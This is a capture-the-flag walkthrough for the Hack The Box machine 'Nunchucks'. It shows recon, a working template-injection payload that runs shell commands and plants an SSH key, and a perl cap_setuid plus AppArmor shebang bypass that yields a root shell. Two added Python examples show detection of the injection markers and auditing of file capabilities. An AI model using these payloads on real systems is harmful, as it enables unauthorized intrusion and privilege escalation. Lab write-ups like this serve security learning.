Nunchucks - Easy

Introduction@Nunchucks:~$
Name: Nunchucks
IP: 10.10.11.122
Points: 40
OS: Linux
Difficulty: Easy
Creator:
Release Date: 02 / Nov / 2021
Recon
Nmap
┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ cat nmap.out
# Nmap 7.92 scan initiated Wed Nov 3 15:20:27 2021 as: nmap -sC -sV -oN nmap.out 10.10.11.122
Nmap scan report for 10.10.11.122
Host is up (0.42s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
| 256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_ 256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-trane-info: Problem with XML parsing of /evox/about
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after: 2031-08-28T15:42:24
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 3 15:21:19 2021 -- 1 IP address (1 host up) scanned in 52.42 seconds
Only 3 ports are open, and the TLS certificate and the HTTP redirect both show a DNS name, nunchucks.htb. So add it to our /etc/hosts:
echo 10.10.11.122 nunchucks.htb | sudo tee -a /etc/hosts
Web

I tried directory brute-forcing but found nothing interesting. There is also a signup page, which is currently closed. So there is not much we can do here. Let's look for vhosts instead.
Finding Vhosts
┌─[sheinn101@parrot]─[~/htb/nunchucks]
└──╼ [??]$ ffuf -u https://FUZZ.nunchucks.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : https://FUZZ.nunchucks.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
store [Status: 200, Size: 4029, Words: 1053, Lines: 102]
Found a subdomain called store.nunchucks.htb. Add this to /etc/hosts as well.
If we visit this domain, we can see another web page, this one running Express, a JavaScript web framework.

When we enter an email and click on Notify Me, it reflects a message back to us.

So I tried SSTI (Server-Side Template Injection) like this.

Now we can confirm there is Server-Side Template Injection.
After wasting some time on Google, I found a website showing how to get code execution in the Nunchucks template engine.
Intercept the request with Burp and enter a payload like this:
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}@gmail.com
Note: if you copy from the original website, don't forget to escape the double quotes.

Now we get the content of /etc/passwd.
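To show the defensive side of the injection above, here is an added Python example (not code from this write-up or from the store application) that inspects the JSON body of the Notify Me request before anything reaches the template engine: it rejects values carrying template delimiters or the Node.js identifiers used in the payload, and applies a strict allowlist to the email field. The function names, the marker list and the benign sample address are my assumptions; the two injected samples are constructed from the payload shape quoted above. The real fix in the application is to pass the email to the template as a context variable instead of concatenating it into the template source; a filter like this complements that fix and gives the logs a clear "injection attempt" signal.

```python
import json
import re

# Strict allowlist for the "Notify Me" email field. Template delimiters such
# as {{ or {% cannot pass, so a value that reaches the renderer is plain text.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

# Markers that show up in template-injection probes and payloads aimed at
# JavaScript engines; the write-up's payload contains every one of the last four.
SSTI_MARKERS = ("{{", "}}", "{%", "%}", "constructor",
                "mainModule", "child_process", "execSync")


def is_valid_email(value):
    """True when the address matches the allowlist regex."""
    return EMAIL_RE.fullmatch(value) is not None


def ssti_markers(value):
    """Return the markers present in the value, in definition order."""
    return [m for m in SSTI_MARKERS if m in value]


def inspect_request(body_json):
    """Decide whether a POST body for the notify endpoint may be rendered.

    Returns a dict with 'accept' (bool), 'reason' (str) and 'markers' (list).
    Marker checks run before the format check so that a probe is logged as an
    injection attempt rather than as a mere invalid address.
    """
    try:
        body = json.loads(body_json)
    except json.JSONDecodeError:
        return {"accept": False, "reason": "malformed json", "markers": []}
    email = body.get("email") if isinstance(body, dict) else None
    if not isinstance(email, str):
        return {"accept": False, "reason": "email missing or not a string", "markers": []}
    markers = ssti_markers(email)
    if markers:
        return {"accept": False, "reason": "template injection markers", "markers": markers}
    if not is_valid_email(email):
        return {"accept": False, "reason": "invalid email format", "markers": []}
    return {"accept": True, "reason": "ok", "markers": []}


def audit_bodies(bodies):
    """Run inspect_request over several bodies, e.g. when replaying logged requests."""
    return [inspect_request(b) for b in bodies]


# Constructed sample bodies: a benign address, the classic arithmetic probe,
# and the command-execution payload quoted in the write-up.
PAYLOAD = ('{{range.constructor("return global.process.mainModule'
           ".require('child_process').execSync('tail /etc/passwd')\")()}}@gmail.com")
SAMPLE_BODIES = [json.dumps({"email": e}) for e in
                 ("alice@example.com", "{{7*7}}@gmail.com", PAYLOAD)]

if __name__ == "__main__":
    for body, verdict in zip(SAMPLE_BODIES, audit_bodies(SAMPLE_BODIES)):
        print(verdict["reason"], verdict["markers"], body[:60])
```

The marker list is deliberately short and specific to JavaScript engines; for a different engine the identifiers to watch for change, but the ordering (markers first, then format) and the allowlist idea stay the same.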
Getting User David
I generated an SSH key with ssh-keygen on my local machine.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh-keygen -f david
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in david
Your public key has been saved in david.pub
The key fingerprint is:
SHA256:zhOVx8gBnLp4OWrXr3ErJzzFxCnmWguQqm/jIRMpSOk sheinn101@parrot
The key's randomart image is:
+---[RSA 3072]----+
| ..o. |
| . o. = |
| o . . .=.o |
|+. o . o.+. |
|=E . o =S+ |
|... . *oo.o |
|o.. o B=o. |
|.oo.o o B+.. |
| +oo . .Bo |
+----[SHA256]-----+
Put our SSH public key into /home/david/.ssh/authorized_keys.
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo "YOUR SSH PUBLIC KEY" > /home/david/.ssh/authorized_keys')\")()}}@gmail.com"}
And then we can log in with SSH.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh -i david david@10.10.11.122
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-86-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 8 Nov 05:50:27 UTC 2021
System load: 0.0 Processes: 230
Usage of /: 48.8% of 6.82GB Users logged in: 0
Memory usage: 48% IPv4 address for ens160: 10.10.11.122
Swap usage: 0%
10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Oct 22 19:09:52 2021 from 10.10.14.6
david@nunchucks:~$ ls
user.txt
david@nunchucks:~$ cat user.txt
d5beec8da1********65e4f46a2a6a
david@nunchucks:~$
Privilege Escalation
After some enumeration, there is an interesting file in the /opt directory.
david@nunchucks:/opt$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Oct 28 17:03 .
drwxr-xr-x 19 root root 4096 Oct 28 17:03 ..
-rwxr-xr-x 1 root root 838 Sep 1 12:53 backup.pl
drwxr-xr-x 2 root root 4096 Oct 28 17:03 web_backups
david@nunchucks:/opt$
backup.pl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);
my $tmpdir = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";
sub printlog
{
print "[", strftime("%D %T", localtime), "] $_[0]\n";
}
sub archive
{
printlog "Archiving...";
system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
printlog "Backup complete in $tmpbdir/backup_$now.tar";
}
if ($> != 0) {
die "You must run this script as root.\n";
}
printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";
This script appears to back up files into the web_backups directory, which is owned by root.
It also calls POSIX::setuid(0); to run as root, but for that call to succeed, perl must be SUID or hold a capability.
From the linpeas output, we can see it has CAP_SETUID.

You can also check with this command: getcap -r / 2>/dev/null
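Because the file capability, not the backup script itself, is what makes this escalation possible, here is an added Python example (not from the write-up or the box) that turns getcap output into findings: it accepts both libcap output styles, flags capabilities that amount to root, and rates them critical when they sit on an interpreter such as perl, since every script the interpreter runs inherits them. The sample getcap lines are constructed to match what the write-up describes; the dangerous-capability list, the interpreter list and the function names are my choices. The fix on a host like this is to remove the capability (setcap -r /usr/bin/perl) and run the backup from root's cron or a systemd timer, rather than relying on an AppArmor profile to contain the interpreter.

```python
import re

# File capabilities that let a process change identity, bypass permission
# checks or load code into the kernel; any of them amounts to root.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_setfcap", "cap_chown", "cap_fowner",
    "cap_dac_override", "cap_dac_read_search", "cap_sys_admin",
    "cap_sys_ptrace", "cap_sys_module",
}

# Interpreter binaries: a capability here is inherited by every script they run.
INTERPRETERS = ("perl", "python", "ruby", "node", "php", "lua")


def parse_getcap_line(line):
    """Parse one line of `getcap -r /` output into (path, set_of_caps).

    Handles both libcap styles:
      '/usr/bin/perl = cap_setuid+ep'   (libcap 2.3x, e.g. Ubuntu 20.04)
      '/usr/bin/perl cap_setuid=ep'     (newer libcap)
    A bare '=ep' means every capability, reported here as {'ALL'}.
    Returns None for blank lines.
    """
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        path, _, caps = line.partition(" ")
    # Strip the flag suffix (+ep / =ep), leaving only the comma-separated names.
    names = re.split(r"[+=]", caps.strip(), maxsplit=1)[0]
    cap_set = {c.strip() for c in names.split(",") if c.strip()}
    return path, (cap_set or {"ALL"})


def audit_getcap(output):
    """Return findings for each binary whose capabilities amount to root."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = sorted(caps & DANGEROUS_CAPS) if "ALL" not in caps else ["ALL"]
        if not risky:
            continue
        basename = path.rsplit("/", 1)[-1]
        is_interp = any(basename.startswith(i) for i in INTERPRETERS)
        findings.append({
            "path": path,
            "caps": risky,
            "interpreter": is_interp,
            "severity": "critical" if is_interp else "high",
        })
    return findings


# Constructed sample, modelled on the write-up: cap_net_raw on ping-style
# tools is normal, perl carrying cap_setuid is the finding.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.30.0 = cap_setuid+ep
"""

if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP):
        print(f["severity"].upper(), f["path"], ",".join(f["caps"]))
```

Pipe real output in with `getcap -r / 2>/dev/null | python3 audit.py` after swapping the sample for sys.stdin.read(); the two-severity split keeps the common cap_net_raw entries out of the report while anything on an interpreter is surfaced at the top.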
GTFOBins
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
I ran this one-liner from GTFOBins, but it did not work as expected. When we run whoami it returns root, yet we still can't read root.txt; it says permission denied.
david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
root
david@nunchucks:/opt$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "cat /root/root.txt";'
cat: /root/root.txt: Permission denied
david@nunchucks:/opt$
But when we put the same one-liner into a script and run it:
david@nunchucks:/tmp$ cat pwned.pl
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";
david@nunchucks:/tmp$ chmod +x pwned.pl
david@nunchucks:/tmp$ ./pwned.pl
root@nunchucks:/tmp# id
uid=0(root) gid=1000(david) groups=1000(david)
root@nunchucks:/tmp# cat /root/root.txt
cf715d729***********b1aac2ebdd9e
Now we have a shell as root.
Note: we can't execute it like this, though. It says permission denied.
david@nunchucks:/tmp$ perl pwned.pl
Can't open perl script "pwned.pl": Permission denied
david@nunchucks:/tmp$
This is weird. I searched on Google and found an article about this. If a script whose shebang points to the restricted application is used, the script is not given the same restrictions and is executed, as shown in the link. Knowing that, we can execute scripts through the shebang and the AppArmor profile won't be applied to the script. That's it.

Author Account : https://app.hackthebox.com/profile/237587